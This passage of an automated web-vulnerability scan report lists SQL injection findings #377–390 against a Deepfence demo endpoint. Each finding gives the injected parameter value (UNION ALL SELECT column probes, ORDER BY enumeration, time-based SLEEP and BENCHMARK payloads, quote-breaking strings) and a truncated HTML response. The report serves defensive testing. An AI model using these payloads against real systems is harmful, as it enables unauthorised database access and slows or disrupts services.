href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #377\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #378\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #379\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #380Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #381\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #382\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #383\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #384\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \" or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #385\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #386\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #387\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #388\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #389\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1' ORDER BY 1,2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #390\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 